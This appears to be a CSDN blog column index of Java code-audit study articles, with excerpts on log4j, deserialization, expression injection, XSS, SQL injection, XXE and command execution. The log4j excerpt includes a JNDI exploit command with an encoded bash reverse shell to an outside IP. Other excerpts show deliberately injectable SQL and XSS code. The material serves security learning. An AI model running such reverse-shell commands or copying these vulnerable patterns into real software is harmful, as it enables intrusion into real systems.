![](https://img-blog.csdnimg.cn/20190927151043371.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
java代码审计
文章平均质量分 58
java代码审计的学习文章
goddemon
EduSRC 2021年榜第七
土司论坛2022名人堂
src挖掘收入6位数以上
自信从容,虚心进步,慢慢成长
展开
-
代码审计之浅谈RASP技术
想摆会烂,所以就落个笔吧。其实本来是想写关于iast技术的,但是认真思考了下,感觉笔者自己本身也不太能讲清楚iast技术,怕误人子弟。所以最后还是基于笔者的理解以及实际应用写一篇关于RASP技术的文章,笔者能力有限,如有错误,欢迎斧正。原创 2024-05-04 00:12:12 · 1169 阅读 · 0 评论 -
Java审计框架基础
好像已经很久没发过文章了,水一篇吧,最近在回头恶补java web的一些东西还有研究链条和内存马的一些东西,有些东西还没整明白,怕误人子弟,所以暂时就不发了。后面等学明白了在发吧,先发一篇java审计需要的一些基础知识点吧,也能算是开发吧(也是笔者基于javaweb学习过程中自己基于自己的理解的一些学习笔记,所以可能存在一些问题,若有问题,希望批评指教),也希望能给入坑审计java审计的人一些参考吧。而至于实战审计的一些文章,最近一段时间应该是不会打算发的,倒不是说没相关的素材,最近也确实审计了不少的原创 2022-08-19 15:59:04 · 1557 阅读 · 0 评论 -
JAVA安全--log4j漏洞研究分析
log4j漏洞复现复现这里以bugku上的靶场为例进行复现https://ctf.bugku.com/challenges/detail/id/340.html环境配置①ldap服务服务器起一个ldap服务就好了直接执行反弹shell即直接配置bash反弹shell命令java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM原创 2022-03-12 23:49:55 · 9821 阅读 · 0 评论 -
java代码审计--配置文件与servlet程序
①读取基础的配置文件#常见的三个配置文件/WEB-INF/web.xml : #Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。-->三部分①servlet配置+组件配置+spring配置/WEB-INF/classes/ : #包含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中。/WEB-INF/lib/ : #存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的原创 2021-07-15 15:54:41 · 308 阅读 · 0 评论 -
JAVA代码审计之四大框架学习
java三大框架之间的关系1.Struts:基于MVC的充当了其中的视图层和控制器;2.Hibernate:做持久化的,对JDBC轻量级的封装,使得我们能过面向对象的操作数据库;3.Spring: 采用了控制反转的技术,管理Bean,降低了各层之间的耦合。一.Struts框架web.xml//对于代码审计而言这个文件的核心是过滤机制常用<filter-mapping>的<url-pattern>//如 即当是以.action为结尾的请求时 都会调用这个过滤机制原创 2021-08-30 15:24:46 · 577 阅读 · 2 评论 -
java代码审计--反序列化
1.挖掘思路反序列化利用链通常分为三部分,触发点、中继点、执行点2.序列化和反序列化基础知识点序列化反序列化相关类与函数Java.io.ObjectOutputStream //序列化实现方法-->从这个目标流写的和输出的都是序列化java.io.ObjectInputStream //反序列化实现方法-->从这个输出流写的和输出的都是反序列化//相关步骤对象序列化步骤1) 创建一个对象输出流,它可以包装一个其他类型的目标输出流,如文件输出流;2) 通过对象输出流的wri原创 2021-09-15 16:27:58 · 918 阅读 · 0 评论 -
java代码审计--表达式注入
一.java表达式常见引擎和语言jexl–>表达式引擎Nexus Repository Manager 3 RCE 分析 -【CVE-2019-7238spel–>spring表达式语言spel表达式语言学习spel基础知识两种用法1.在代码中处理外部传入的表达式(重点是这个)@RequestMapping("/spel")public String spel(@RequestParam(name = "spel") String spel) { Expression原创 2021-09-15 16:27:31 · 640 阅读 · 0 评论 -
java代码审计--xss漏洞
漏洞两种情况1.直接用request.getParameter(“参数”);去获取值 然后直接用println()输出2.用request.setAttribute输出<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://w原创 2021-09-15 16:27:12 · 465 阅读 · 0 评论 -
java代码审计--sql注入
一.sql注入基础public User getUserById(String id) throws SQLException { Connection connection = JDBCTOOLS.getConnection(); String sql = "select id,username from user where id=" + id; Statement statement = connection.createStatement(); ResultSet resu原创 2021-09-15 16:26:47 · 840 阅读 · 0 评论 -
java代码审计--xxe
常见关键字DocumentbuilderDocumentBuilderFactorySAXReaderSAXParserSAXParserFactorySAXBuilderTransformerFactoryreqXmlgetInputStreamXMLReaderFactory.newInstanceSchemaFactorySAXTransformerFactoryjavax.xml.bindXMLReaderXmlUtils.getValidatorjava解析原创 2021-09-15 16:26:22 · 258 阅读 · 0 评论 -
java代码审计--命令执行
1.java常用执行系统命令函数Runtime.execProcessGroovyShell.evaluateProcessBuilder.start() 2.补充知识点Process类方法:1.destroy()杀掉子进程。2.exitValue()返回子进程的出口值。3.InputStream getErrorStream()获得子进程的错误流。4.InputStream getInputStream()获得子进程的输入流。5.OutputStream getOutput原创 2021-09-15 16:26:02 · 594 阅读 · 0 评论 -
java代码审计--文件控制
文件上传前言:现在这个漏洞的利用其实越来越少了,现在很多主流框架对上传的文件不会放在web可访问的页面下。原创 2021-09-15 16:24:51 · 289 阅读 · 0 评论 -
java代码审计--jsp基础学习
jsp语法动作内容一.jsp生命周期二.jsp语法1.<% %>#语句类写的地方,常规写的地方2.<%! %>#变量定义的地方 如<%! int i = 0; %> 3.<%= %>#表达式#如获取当前的日期<%= (new java.util.Date()).toLocaleString()%> 4.注释<!-- --><%-- --%>三.jsp指令与动作元素3.1 三大典型指令jsp语法原创 2021-09-14 11:00:27 · 472 阅读 · 0 评论